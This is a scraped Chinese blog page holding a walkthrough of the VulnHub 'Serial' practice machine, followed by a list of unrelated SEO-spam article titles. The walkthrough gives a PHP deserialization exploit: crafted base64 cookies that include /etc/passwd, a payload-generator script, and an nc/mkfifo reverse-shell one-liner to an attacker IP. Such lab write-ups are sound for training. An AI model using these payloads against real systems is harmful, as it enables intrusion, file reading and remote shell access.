当前位置: 首页 > news >正文

找别人做网站可以提供源码吗网站建设推广优化

找别人做网站可以提供源码吗,网站建设推广优化,帝国cms网站地址,百度推广网站怎么做一.信息收集 靶机地址下载:https://download.vulnhub.com/serial/serial.zip 打开靶机,在kali虚拟机中进行主机存活探测 可以知道靶机ip地址为192.168.133.171 然后扫描端口 可以发现有一个22端口跟80端口 然后接下来用kali扫描它的目录 可以发现有一…

一.信息收集

靶机地址下载:https://download.vulnhub.com/serial/serial.zip

打开靶机,在kali虚拟机中进行主机存活探测

可以知道靶机ip地址为192.168.133.171

然后扫描端口 可以发现有一个22端口跟80端口

然后接下来用kali扫描它的目录 

可以发现有一个可访问的目录 我们去访问一下

访问之后backup目录下有一个bak.zip 下载下来

下载下来之后有三个文件  分析一下

index.php

<?php
    include("user.class.php");

    if(!isset($_COOKIE['user'])) {
        setcookie("user", base64_encode(serialize(new User('sk4'))));
    } else {
        unserialize(base64_decode($_COOKIE['user']));
    }
    echo "This is a beta test for new cookie handler\n";
?>

log.class.php

<?php
  class Log {
    private $type_log;

    function __costruct($hnd) {
      $this->$type_log = $hnd;
    }

    public function handler($val) {
      include($this->type_log);
      echo "LOG: " . $val;
    }
  }
?>

user.class.php

<?php
  include("log.class.php");

  class Welcome {
    public function handler($val) {
      echo "Hello " . $val;
    }
  }

  class User {
    private $name;
    private $wel;

    function __construct($name) {
      $this->name = $name;
      $this->wel = new Welcome();
    }

    function __destruct() {
      //echo "bye\n";
      $this->wel->handler($this->name);
    }
  }

?>

 提示cookie,burpsuite抓包看一下cookie

cookie那里有一串base64加密的 解密一下

base64解码得到序列化后字段是

O:4:"User":2:{s:10:"Username";s:3:"sk4";s:9:"Userwel";O:7:"Welcome":0:{}}

 然后我们构造payload 读取/etc/passwd文件

O:4:"User":2:{s:10:"\x00User\x00name";s:5:"admin";s:9:"\x00User\x00wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}')

base64编码

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjM6InNrNCI7czo5OiIAVXNlcgB3ZWwiO086MzoiTG9nIjoxOntzOjg6InR5cGVfbG9nIjtzOjExOiIvZXRjL3Bhc3N3ZCI7fX0=

 然后再次抓包 打开用burp的repeater

将加密后的替换一下 就可以看到  然后成功包含  看到有一个sk4用户可登陆

get shell

构造序列化语句上传shell

生成一个shell放在本地网站下

然后构造payload,尝试读取passwd文件,payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马

<?phpclass Log {private $type_log = "/etc/passwd";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

然后去访问自己新创建的php 我这里用的是7.php 打开就看到他的base64编码

然后去抓包 把访问7.php得到的base64编码 替换cookie

成功执行

开始反弹shell

rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>&1|nc+1192.168.133.163+6666+>/tmp/f

将上述代码url编码后填入参数位置

然后在kali里开启监听监听成功 

在攻击模块发送 成功获取shell

查看文件,多返回几次上级目录,找到一个txt文件

查看文件得到他的账号跟密码

最后在远程连接 成功进入

http://www.hengruixuexiao.com/news/11814.html

相关文章:

  • 网站空间免免费创建属于自己的网站
  • 用dw做网站导航的步骤最有效的广告宣传方式
  • 中国铁路建设投资公司网站熊学军郑州做网站推广哪家好
  • 股票查询网站模板 wordpress数字营销案例
  • 移动网站虚拟主机怎么接游戏推广的业务
  • 墨子网站建设高德北斗导航
  • 桂林网站制作培训学校百度站点
  • 几种语言的网站如何做搜索引擎的营销方法有哪些
  • 介休市网站建设公司无锡seo公司哪家好
  • 小说网站搭建教程最新百度快速收录技术
  • 没有外贸网站 如果做外贸南京百度推广开户
  • 武汉做网站公司hlbzx温州seo排名优化
  • 网站开发运行环境百度世界500强排名
  • 点图片跳到网站怎么做的百度退推广费是真的吗
  • 广州广告网站建设新闻最近的大事10件
  • 西部数码虚拟主机怎么做网站建立一个企业网站需要多少钱
  • 广告设计师工作内容成都seo工程师
  • 厦门谷歌推广seo网络推广怎么做
  • 前端页面设计百度seo培训
  • 公司网站域名更改怎么做百度一下官方网页版
  • 一般网站建设费用预算百度竞价推广开户价格
  • 专业做网站和小程序友情链接有什么用
  • 网站被墙检测独立站seo优化
  • wordpress后台禁止更新济南网站seo哪家公司好
  • 高密网站制作成都高端网站建设哪家好
  • 房屋租赁网站开发背景竞价开户公司
  • wordpress rds外贸网站优化推广
  • 什么更新wordpressseo需要培训才能找到工作吗
  • 做网站时怎么插入视频企业文化设计
  • 国家网站备案二次感染即将大爆发